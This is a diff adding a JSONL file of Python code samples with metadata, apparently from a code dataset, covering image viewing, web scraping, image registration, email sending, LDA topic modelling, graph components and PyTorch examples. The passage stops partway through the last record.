diff --git "a/054.jsonl" "b/054.jsonl"
new file mode 100644
--- /dev/null
+++ "b/054.jsonl"
@@ -0,0 +1,425 @@
+{"seq_id": "601335951", "text": "\"\"\"\npython kzpy3/scratch/view_RPi_images.py\n\"\"\"\nfrom kzpy3.vis import *\nfrom matplotlib.animation import FuncAnimation\n\n\nn_frames = 3000\n\nc = 0\nctr = 0\n\ndef even_frames(frame_number):\n\tglobal c\n\tglobal ctr\n\t#print(frame_number)\n\n\tstart_time = time.time()\n\ttry:\n\t\t#c_new = os.path.getctime(opjD('image1.jpg'))\n\t\t#if c_new == c:\n\t\t#\tpass #print('waiting...')\n\t\t#else:\n\t\t#c = c_new\n\t\t#unix(d2n('cp ',opjD('image1.jpg '),' /Users/karlzipser/Desktop/RPi_images/',c_new,'.',ctr,'.jpg'),False)\n\t\t#ctr += 1\n\t\t#print ctr\n\t\timg = imread(opjD('image1.jpg'))\n\t\t#print(shape(img))\n\t\tif shape(img)[2] == 3:\n\t\t\tplt.clf()\n\t\t\tmi(img)\n\t\telse:\n\t\t\tprint('Empyt frame.')\n\texcept KeyboardInterrupt:\n\t\tprint('Quitting now.')\n\t\tsys.exit(1)\n\texcept:\n\t\tpass\n\t#if frame_number == n_frames-1:\n\t#\tplt.close()\n\n\nfig = plt.figure(1,figsize=(9,9))\n\nanimation = FuncAnimation(fig, even_frames, frames=n_frames, interval=30, repeat=False)\n\nplt.show()\n#input('adfa')\nprint('done....')", "sub_path": "scratch/view_RPi_images.py", "file_name": "view_RPi_images.py", "file_ext": "py", "file_size_in_byte": 949, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "matplotlib.animation.FuncAnimation", "line_number": 46, "usage_type": "call"}]}
+{"seq_id": "634636881", "text": "#coding:utf-8\nimport requests\nfrom bs4 import BeautifulSoup\nimport pickle\n\nreq = requests.get('https://docs.python.org/2/library/index.html')\nsoup = BeautifulSoup(req.text,\"lxml\")\nalist = []\nindex = {\"title\":'The Python Standard Library',\n \"url\":\"https://docs.python.org/2/library/index.html\"}\nalist.append(index)\nfor i in soup.find_all('li',attrs={'class':'toctree-l1'}):\n atags = i.find_all('a')\n for a in atags:\n til = a.get_text()\n url = 'https://docs.python.org/2/library/'+a.get('href')\n if '#' in url:\n continue\n art = {'title':til,'url':url}\n alist.append(art)\n\nf = open(r'C:\\Users\\jim\\Desktop\\dict.txt','w')\npickle.dump(alist,f)\n\nf.close()", "sub_path": "0000python/mobi_recipe/0recipe-pickle.py", "file_name": "0recipe-pickle.py", "file_ext": "py", "file_size_in_byte": 707, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "requests.get", "line_number": 6, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 7, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "605964154", "text": "import abc\nfrom PIL import Image, ImageTk\nimport numpy as np\nfrom typing import Tuple\n\n\nclass VComponent(abc.ABC):\n\n def __init__(self, row: int, column: int, size: Tuple[int, int]):\n self._functions = None\n self._row = row\n self._column = column\n self._width = size[0]\n self._height = size[1]\n\n @abc.abstractmethod\n def draw(self):\n pass\n\n def set_function(self, functions: dict, **kwargs):\n self._functions = functions\n\n @staticmethod\n def numpy_2_tkinter(img_raw: np.ndarray):\n img = ImageTk.PhotoImage(image=Image.fromarray(img_raw))\n\n return img\n", "sub_path": "view/view_component.py", "file_name": "view_component.py", "file_ext": "py", "file_size_in_byte": 632, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "abc.ABC", "line_number": 7, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 9, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 24, "usage_type": "attribute"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 25, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 25, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 25, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 25, "usage_type": "name"}]}
+{"seq_id": "161387583", "text": "from os.path import join\nimport argparse\nfrom tibtexts.ocrvol import OCRVol\n\nparser = argparse.ArgumentParser(description='Insert Milestones from OCR in Unicode Docs')\nparser.add_argument('-v', '--vol', required=True,\n help='The Volume Number')\nargs = parser.parse_args()\n\n\nif __name__ == \"__main__\":\n kwargs = vars(args)\n volnum = kwargs['vol']\n volfilenm = \"kama-ocr-vol-{}.txt\".format(str(volnum).zfill(3))\n volpath = join('resources', 'ocr', volfilenm)\n volobj = OCRVol(volpath)\n volobj.print_stats()\n", "sub_path": "find-bad-vol-pages.py", "file_name": "find-bad-vol-pages.py", "file_ext": "py", "file_size_in_byte": 542, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "tibtexts.ocrvol.OCRVol", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "81590969", "text": "import SimpleITK as sitk\nimport tifffile as tiff\nimport utils\n\nfixed = \"/media/store/krs/caseFiles/vwi_proc/case01/case_1_im_0000.tiff\"\n\nmoving = \"/media/store/krs/caseFiles/vwi_proc/case01/case_1_im_0001.tiff\"\n\nim_f = tiff.imread(fixed, key=4)\nim_t = tiff.imread(moving, key=4)\n# print(im_t.shape, im_f[:,:,:3].shape)\n#quit()\nspacing = ( 2.02, 2.02)\nf_sitk = utils.get_sitk_image(im_f, spacing = spacing)\n\nt_sitk = utils.get_sitk_image(im_t, spacing = spacing)\n\n# print(t_sitk)\n\n#numberOfChannels = 3\n\nelastix = sitk.ElastixImageFilter()\nelastix.SetFixedImage(f_sitk)\nelastix.SetMovingImage(t_sitk)\n\nprint('number of images:')\nprint( elastix.GetNumberOfFixedImages())\nprint( elastix.GetNumberOfMovingImages())\n\n# read parameter file from disk so we are using the same file as command line\n#elastix.SetParameterMap(elastix.ReadParameterFile('params_6.txt'))\nrigid = sitk.GetDefaultParameterMap(\"rigid\")\naffine = sitk.GetDefaultParameterMap(\"affine\")\nsitk.PrintParameterMap(rigid)\n#quit()\n#sitk.PrintParameterMap(affine)\nparameterMapVector = sitk.VectorOfParameterMap()\nparameterMapVector.append(rigid)\n#parameterMapVector.append(sitk.GetDefaultParameterMap(\"affine\"))\n#parameterMapVector.append(sitk.GetDefaultParameterMap(\"bspline\"))\nelastix.SetParameterMap(parameterMapVector)\n\nelastix.SetOutputDirectory('./result/')\nelastix.LogToConsoleOff()\nelastix.SetLogToFile(True)\n\nelastix.Execute()\n\nsitk.PrintParameterMap(elastix.GetTransformParameterMap())\n\nmoving_resampled = elastix.GetResultImage()\n\nutils.display_images(fixed_npa = sitk.GetArrayViewFromImage(f_sitk),\n moving_npa = sitk.GetArrayViewFromImage(moving_resampled))", "sub_path": "hist/test_elastix2.py", "file_name": "test_elastix2.py", "file_ext": "py", "file_size_in_byte": 1640, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tifffile.imread", "line_number": 9, "usage_type": "call"}, {"api_name": "tifffile.imread", "line_number": 10, "usage_type": "call"}, {"api_name": "utils.get_sitk_image", "line_number": 14, "usage_type": "call"}, {"api_name": "utils.get_sitk_image", "line_number": 16, "usage_type": "call"}, {"api_name": "SimpleITK.ElastixImageFilter", "line_number": 22, "usage_type": "call"}, {"api_name": "SimpleITK.GetDefaultParameterMap", "line_number": 32, "usage_type": "call"}, {"api_name": "SimpleITK.GetDefaultParameterMap", "line_number": 33, "usage_type": "call"}, {"api_name": "SimpleITK.PrintParameterMap", "line_number": 34, "usage_type": "call"}, {"api_name": "SimpleITK.VectorOfParameterMap", "line_number": 37, "usage_type": "call"}, {"api_name": "SimpleITK.PrintParameterMap", "line_number": 49, "usage_type": "call"}, {"api_name": "utils.display_images", "line_number": 53, "usage_type": "call"}, {"api_name": "SimpleITK.GetArrayViewFromImage", "line_number": 53, "usage_type": "call"}, {"api_name": "SimpleITK.GetArrayViewFromImage", "line_number": 54, "usage_type": "call"}]}
+{"seq_id": "471531758", "text": "\"\"\" A simple server to send status update emails \"\"\"\nimport os\nimport smtplib\nimport imaplib\nimport email\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.message import MIMEMessage\n\nclass EmailServer(object):\n def __init__(self, email_config):\n self.email_config = email_config\n self.EMAIL_ADDRESS = email_config['FROM_UID'] + email_config['EMAIL_ORG']\n self.FROM_PWD = email_config['FROM_PWD']\n self.SMTP_SERVER = email_config['SMTP_SERVER']\n self.SMTP_PORT = email_config['SMTP_PORT']\n # IMAP_SERVER = email_config['IMAP_SERVER']\n\n # set up to send emails\n\n def connect(self):\n self.sendserver = smtplib.SMTP(self.SMTP_SERVER, self.SMTP_PORT)\n self.sendserver.ehlo()\n self.sendserver.starttls()\n self.sendserver.ehlo()\n self.sendserver.login(self.EMAIL_ADDRESS, self.FROM_PWD)\n\n # set up to receive emails\n# self.inbox = imaplib.IMAP4_SSL(IMAP_SERVER)\n# self.inbox.login(self.EMAIL_ADDRESS, self.FROM_PWD)\n# self.inbox.select('inbox')\n\n def send_email(self, to, subject, body_text):\n self.connect()\n new = MIMEMultipart(\"mixed\")\n body = MIMEMultipart(\"alternative\")\n body.attach( MIMEText(\"{}\".format(body_text.encode('utf-8')), \"html\") )\n # body.attach( MIMEText(\"reply body text\", \"html\") )\n new.attach(body)\n\n new[\"Message-ID\"] = email.utils.make_msgid()\n new[\"Subject\"] = subject\n new[\"To\"] = to\n new[\"From\"] = self.EMAIL_ADDRESS\n\n self.sendserver.sendmail(self.EMAIL_ADDRESS, [new[\"To\"]], new.as_string())\n\n def quit(self):\n self.sendserver.quit()\n # self.inbox.quit()\n", "sub_path": "chainer_monitor/email_server.py", "file_name": "email_server.py", "file_ext": "py", "file_size_in_byte": 1772, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "smtplib.SMTP", "line_number": 22, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 35, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 36, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 37, "usage_type": "call"}, {"api_name": "email.utils.make_msgid", "line_number": 41, "usage_type": "call"}, {"api_name": "email.utils", "line_number": 41, "usage_type": "attribute"}]}
+{"seq_id": "86000944", "text": "from bs4 import BeautifulSoup\n\n\nimport glob\nimport os\nimport sys\n\n\ndef main(export_path):\n os.chdir(export_path)\n\n for html_file in glob.glob(\"**/*.html\", recursive=True):\n # HTML\n html_file_handle = open(html_file, \"r+\")\n html_soup = BeautifulSoup(html_file_handle, \"html.parser\")\n html_body = html_soup.find(\"body\")\n\n html_wrapper = html_soup.new_tag(\"div\")\n\n for html_tag in reversed(html_body.contents):\n html_wrapper.insert(0, html_tag.extract())\n\n html_body.append(html_wrapper)\n\n [script.extract() for script in html_soup.findAll(\"script\")]\n html_body.name = \"template\"\n html_file_handle.close()\n\n # CSS\n css_clean_name = html_file.split('\\\\')[-1].replace('.html', '.css')\n css_soup = None\n\n try:\n css_file_handle = open(f\"./assets/css/{css_clean_name}\", \"r+\")\n css_soup = BeautifulSoup(css_file_handle, \"html.parser\")\n css_file_handle.close()\n except:\n css_soup = BeautifulSoup(\"\", \"html.parser\")\n\n # Vue\n vue_soup = []\n vue_style_tags = []\n\n try:\n vue_file_handle = open(f\"{html_file.split('.')[0]}.vue\", \"r+\")\n vue_soup = BeautifulSoup(vue_file_handle, \"html.parser\")\n vue_style_tags = vue_soup.findAll(\"style\")\n except:\n vue_soup = BeautifulSoup(\"\", \"html.parser\")\n\n if len(vue_soup) > 0:\n if len(vue_style_tags) > 0:\n style_wrapper = vue_soup.new_tag(\"style\")\n\n for style in reversed(css_soup.contents):\n style_wrapper.insert(0, style.extract())\n\n vue_style_tags[0].extract()\n vue_soup.append(style_wrapper)\n\n vue_template_tags = vue_soup.findAll(\"template\")\n\n if len(vue_template_tags) > 0:\n vue_template_tags[0].replaceWith(html_body)\n else:\n vue_soup.insert(0, BeautifulSoup(\n \"\", \"html.parser\"))\n vue_soup.insert(1, html_body)\n\n vue_file_handle.close()\n vue_file_handle = open(f\"{html_file.split('.')[0]}.vue\", \"w+\")\n vue_file_handle.write(vue_soup.prettify(formatter=\"html5\"))\n vue_file_handle.close()\n else:\n vue_file_handle = open(f\"{html_file.split('.')[0]}.vue\", \"w+\")\n vue_soup = BeautifulSoup(vue_file_handle, \"html.parser\")\n vue_soup.insert(0, BeautifulSoup(\"\", \"html.parser\"))\n vue_soup.insert(1, html_body)\n vue_soup.append(BeautifulSoup(\n \"\", \"html.parser\"))\n vue_soup.append(BeautifulSoup(\n f\"\", \"html.parser\"))\n vue_file_handle.write(vue_soup.prettify(formatter=\"html5\"))\n vue_file_handle.close()\n\n os.remove(html_file)\n\n return\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n main(sys.argv[1])\n else:\n print(f\"Usage: {sys.argv[0]} export_path\")\n", "sub_path": "vueify.py", "file_name": "vueify.py", "file_ext": "py", "file_size_in_byte": 3159, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.chdir", "line_number": 10, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 15, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 35, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 38, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 46, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 49, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 66, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 76, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 77, "usage_type": "call"}, {"api_name": 
"bs4.BeautifulSoup", "line_number": 79, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 81, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 86, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 92, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 93, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 95, "usage_type": "attribute"}]}
+{"seq_id": "651679291", "text": "# Copyright (c) 2022 Graphcore Ltd. All rights reserved.\nimport popxl\nimport popxl.ops as ops\nimport numpy as np\nimport pytest\nimport popart._internal.ir as _ir\nfrom utils import contains_op_of_type\n\n\nclass TestConv:\n @pytest.mark.parametrize(\n \"pad_type\", (\"not_set\", \"same_upper\", \"same_lower\", \"valid\")\n )\n def test_fn(self, pad_type):\n batch_size = 1\n in_channel = 4\n out_channel = 4\n height = 1\n width = 1\n h_kernel = 1\n w_kernel = 1\n strides = (1, 1)\n pads = (0, 0, 0, 0)\n dilations = (1, 1)\n group = 1\n ir = popxl.Ir()\n g = ir.main_graph\n with ir.main_graph:\n t = popxl.variable(np.random.rand(batch_size, in_channel, height, width))\n weight = popxl.variable(\n np.random.rand(out_channel, int(in_channel / group), h_kernel, w_kernel)\n )\n _ = ops.conv(t, weight, strides, pads, dilations, group, pad_type)\n assert len(g.tensors) == 3\n assert len(g.variables) == 2\n assert contains_op_of_type(\"Conv\", _ir.op.ConvOp, g)\n", "sub_path": "tests/unittests/python/popxl/ops/test_conv.py", "file_name": "test_conv.py", "file_ext": "py", "file_size_in_byte": 1118, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "popxl.Ir", "line_number": 26, "usage_type": "call"}, {"api_name": "popxl.variable", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 29, "usage_type": "attribute"}, {"api_name": "popxl.variable", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 31, "usage_type": "attribute"}, {"api_name": "popxl.ops.conv", "line_number": 33, "usage_type": "call"}, {"api_name": "popxl.ops", "line_number": 33, "usage_type": "name"}, {"api_name": "utils.contains_op_of_type", "line_number": 36, "usage_type": "call"}, {"api_name": "popart._internal.ir.op", "line_number": 36, "usage_type": "attribute"}, {"api_name": "popart._internal.ir", "line_number": 36, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 11, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 11, "usage_type": "attribute"}]}
+{"seq_id": "443357830", "text": "from __future__ import unicode_literals\n\nimport pickle\nimport random\nimport sys\nimport time\n\nimport gensim\nimport hazm\nfrom sklearn import svm\n\ndic_data = dict()\n\n\nclass SupervisedData:\n def __init__(self, dat, lab):\n self.data = dat\n self.label = lab\n self.topics = None\n\n\ndef stem_data(dat):\n normalizer = hazm.Normalizer()\n dat = normalizer.normalize(dat)\n sent = hazm.sent_tokenize(dat)\n\n words = []\n\n for s in sent:\n tagged = list(tagger.tag(hazm.word_tokenize(s)))\n new_tag = list(tagged)\n\n for token in tagged:\n if token[0] in stop_words:\n new_tag.remove(token)\n\n lemmatizer = hazm.Lemmatizer()\n for token in new_tag:\n\n stemmed = lemmatizer.lemmatize(token[0], pos=token[1])\n stemmer = hazm.Stemmer()\n stemmed = stemmer.stem(stemmed)\n if len(stemmed) > 0 and ('#' not in stemmed):\n words.append(stemmed)\n\n return words\n\n\nif __name__ == '__main__':\n start_time = time.time()\n DATA_SIZE = 72000\n TRAIN_SIZE = 43200\n VALIDATION_SIZE = 14400\n TEST_SIZE = 14400\n\n # code for first time\n data_addr = sys.argv[1]\n label_addr = sys.argv[2]\n\n # comment this part if you have saved objects\n tagger = hazm.POSTagger(model='resources/postagger.model')\n stop_words = open('files/stopwords-fa.txt', 'r', encoding='utf-8').read().split('\\n')\n\n # file = open(data_addr, 'r', encoding='utf-8')\n file = open('data/train.content', 'r', encoding='utf-8')\n content = file.read().split('\\n')\n\n # file = open(label_addr, 'r', encoding='utf-8')\n file = open('data/train.label', 'r', encoding='utf-8')\n tag = file.read().split('\\n')\n\n datas = list()\n docs_words = []\n\n for i in range(DATA_SIZE + 1):\n paraph = content[i]\n datas.append(SupervisedData(content[i], tag[i]))\n docs_words.append(stem_data(content[i]))\n\n # saving objects\n pickle_out = open(\"files/docs_words.pickle\", \"wb\")\n pickle.dump(docs_words, pickle_out)\n pickle_out.close()\n\n # saving objects\n pickle_out = open(\"files/datas.pickle\", \"wb\")\n pickle.dump(datas, pickle_out)\n pickle_out.close()\n\n dictionary = gensim.corpora.Dictionary(docs_words)\n dictionary.save('files/lda_dictionary.dict')\n\n corpus = [dictionary.doc2bow(text) for text in docs_words]\n\n ldamodel = gensim.models.ldamodel.LdaModel(corpus, num_topics=100, id2word=dictionary, passes=50)\n ldamodel.save('files/lda.model')\n\n '''\n # load saved objects\n ldamodel = gensim.models.LdaModel.load('files/lda.model')\n dictionary = gensim.corpora.Dictionary.load('files/lda_dictionary.dict')\n pickle_in = open(\"files/datas.pickle\", \"rb\")\n datas = pickle.load(pickle_in)\n\n pickle_in = open(\"files/docs_words.pickle\", \"rb\")\n docs_words = pickle.load(pickle_in)\n '''\n\n for i in range(DATA_SIZE + 1):\n tpcs = [0 for x in range(100)]\n for item in ldamodel.get_document_topics(dictionary.doc2bow(docs_words[i])):\n tpcs[item[0]] = item[1]\n datas[i].topics = tpcs\n\n # shuffle data for picking train, validation and test data\n random.shuffle(datas)\n\n # saving objects\n pickle_out = open(\"files/random_datas.pickle\", \"wb\")\n pickle.dump(datas, pickle_out)\n pickle_out.close()\n\n '''\n pickle_in = open(\"files/random_datas.pickle\", \"rb\")\n datas = pickle.load(pickle_in)\n '''\n\n train_set = datas[:TRAIN_SIZE]\n validation_set = datas[TRAIN_SIZE + 1:TRAIN_SIZE + VALIDATION_SIZE + 1]\n test_set = datas[TRAIN_SIZE + VALIDATION_SIZE + 1:]\n\n # comment part above after saving objects for model learning and division\n\n # SVM chapter\n X = [d.topics for d in train_set] # list 
of features for each data\n y = [d.label for d in train_set] # list of labels\n print(X)\n print(y)\n # Create the SVC model object\n C = 1.0 # SVM regularization parameter\n svc = svm.SVC(kernel='rbf', C=C, decision_function_shape='ovr').fit(X, y)\n\n # saving svm model\n pickle_out = open(\"files/svm.pickle\", \"wb\")\n pickle.dump(svc, pickle_out)\n pickle_out.close()\n\n print('time: ', time.time() - start_time, \"s\")\n", "sub_path": "hw2.py", "file_name": "hw2.py", "file_ext": "py", "file_size_in_byte": 4198, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "hazm.Normalizer", "line_number": 23, "usage_type": "call"}, {"api_name": "hazm.sent_tokenize", "line_number": 25, "usage_type": "call"}, {"api_name": "hazm.word_tokenize", "line_number": 30, "usage_type": "call"}, {"api_name": "hazm.Lemmatizer", "line_number": 37, "usage_type": "call"}, {"api_name": "hazm.Stemmer", "line_number": 41, "usage_type": "call"}, {"api_name": "time.time", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 57, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 58, "usage_type": "attribute"}, {"api_name": "hazm.POSTagger", "line_number": 61, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 82, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 87, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 90, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 90, "usage_type": "attribute"}, {"api_name": "gensim.models.ldamodel.LdaModel", "line_number": 95, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 95, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 116, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 120, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 141, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 141, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 145, "usage_type": "call"}, {"api_name": "time.time", "line_number": 148, "usage_type": "call"}]}
+{"seq_id": "286307028", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom autobahn import wamp\nfrom autobahn.twisted.wamp import ApplicationSession, ApplicationRunner\nfrom twisted.internet.defer import inlineCallbacks\nfrom autobahn.twisted.websocket import WebSocketServerProtocol\n\nfrom welcome import Hello\n\n\nclass PeriocularBackend(ApplicationSession):\n\n def __init__(self, config):\n ApplicationSession.__init__(self, config)\n \n \n @wamp.register(u'com.periocular.welcome')\n def welcome(self):\n hy = Hello()\n hy.hello()\n \n\n\n @inlineCallbacks\n def onJoin(self, details):\n res = yield self.register(self)\n print(\"PeriocularBackend: {} procedimentos registrados!\".format(len(res)))\n try:\n # Publicando Welcome\n print(\"Publicando Welcome...\")\n self.publish(u'com.periocular.welcome')\n estado = self.subscribe(u'com.periocular.android') # se inscrevendo em topico android\n print(\"Resultado da inscrição {}\".format(estado))\n\n except Exception as exception:\n print(\"Erro na publicação: {}\".format(exception))\n\n\ndef main():\n\n # Crossbar.io connection configuration\n url = u'ws://localhost:8080/ws'\n realm = u'roteador-crossbar'\n\n # now actually run a WAMP client using our session class ClientSession\n runner = ApplicationRunner(url, realm)\n runner.run(PeriocularBackend, auto_reconnect=True)\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "roteador.py", "file_name": "roteador.py", "file_ext": "py", "file_size_in_byte": 1475, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "autobahn.twisted.wamp.ApplicationSession", "line_number": 12, "usage_type": "name"}, {"api_name": "autobahn.twisted.wamp.ApplicationSession.__init__", "line_number": 15, "usage_type": "call"}, {"api_name": "autobahn.twisted.wamp.ApplicationSession", "line_number": 15, "usage_type": "name"}, {"api_name": "welcome.Hello", "line_number": 20, "usage_type": "call"}, {"api_name": "autobahn.wamp.register", "line_number": 18, "usage_type": "call"}, {"api_name": "autobahn.wamp", "line_number": 18, "usage_type": "name"}, {"api_name": "twisted.internet.defer.inlineCallbacks", "line_number": 25, "usage_type": "name"}, {"api_name": "autobahn.twisted.wamp.ApplicationRunner", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "202993219", "text": "from collections import deque\n \ninfile = open('components.in', 'r')\noutfile = open('components.out', 'w')\n \nn,e = [int(i) for i in infile.readline().split()] \n \n#edgelist\nedges=[] \nfor i in range(e):\n edges.append([int(j) for j in infile.readline().split()])\n \n#neighbours\nfrom collections import defaultdict\nneighbours = defaultdict(lambda: defaultdict(lambda: 0))\nfor v1, v2 in edges:\n neighbours[v1][v2] += 1\n neighbours[v2][v1] += 1\n \ndef dfs():\n num_component ={}\n comp = 0\n for i in range(1, n+1):\n if i not in num_component:\n comp += 1\n num_component[i] = comp\n queue = deque([i])\n while len(queue) > 0:\n for v in neighbours[queue[0]]:\n if v not in num_component:\n num_component[v] = comp\n queue.append(v)\n queue.popleft()\n outfile.write(str(comp)+ '\\n')\n for i in num_component.values():\n outfile.write(str(i)+' ')\ndfs()\n \n \ninfile.close()\noutfile.close()", "sub_path": "sergeeva/graphs/comp.py", "file_name": "comp.py", "file_ext": "py", "file_size_in_byte": 1040, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "collections.defaultdict", "line_number": 15, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "482766042", "text": "import torch\nimport visdom\nimport matplotlib.pyplot as plt\n\nN, D_in, H, D_out = 64, 1000, 100, 10\n\ndevice = torch.device(\"cuda:1\")\n# device = torch.device(\"cpu\")\n\nx = torch.rand(N, D_in, device=device)\ny = torch.rand(N, D_out, device=device)\n\ndef default_NN():\n # 利用torch.nn.Sequential搭建的级联网络\n model = torch.nn.Sequential(\n torch.nn.Linear(D_in, H),\n torch.nn.ReLU(),\n torch.nn.Linear(H, D_out), )\n\n if device.type != 'cpu':\n model = model.cuda(device=device)\n loss_func = torch.nn.MSELoss(size_average=False)\n\n lr = 1e-4\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n\n for step in range(5000):\n y_pred = model(x)\n loss = loss_func(y_pred, y)\n print(step, loss.data.cpu().numpy())\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n return model\n\n\n\n\ndef selfBuild_NN():\n # 通过自建class构建神经网络\n class TwoLayerNet(torch.nn.Module):\n def __init__(self,D_in, H, D_out):\n super(TwoLayerNet, self).__init__()\n self.linear1 = torch.nn.Linear(D_in, H)\n self.linear2 = torch.nn.Linear(H, D_out)\n\n def forward(self, x):\n h_relu = self.linear1(x).clamp(min=0)\n relu_func = torch.nn.ReLU()\n y_pred = self.linear2(relu_func(h_relu))\n return y_pred\n\n # instance self-build nn\n model = TwoLayerNet(D_in, H, D_out)\n if device.type != 'cpu':\n model = model.cuda(device=device)\n loss_func = torch.nn.MSELoss(size_average=False)\n optimizer = torch.optim.SGD(model.parameters(), lr=1e-4)\n\n for step in range(5000):\n y_pred = model(x)\n loss = loss_func(y_pred, y)\n print(step, loss.item())\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n return model\n\n\n\n\n\n\nif __name__ == '__main__':\n # selfBuild_NN()\n vis = visdom.Visdom(env=u'test1')\n\n x = torch.arange(1, 30, 0.01)\n y = torch.sin(x)\n vis.line(X=x, Y=y, win='sinx', opts={'title': 'y=sin(x)'})\n\n\n\n", "sub_path": "torch_basic_NN.py", "file_name": "torch_basic_NN.py", "file_ext": "py", "file_size_in_byte": 2073, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "torch.device", "line_number": 7, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn.MSELoss", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": 
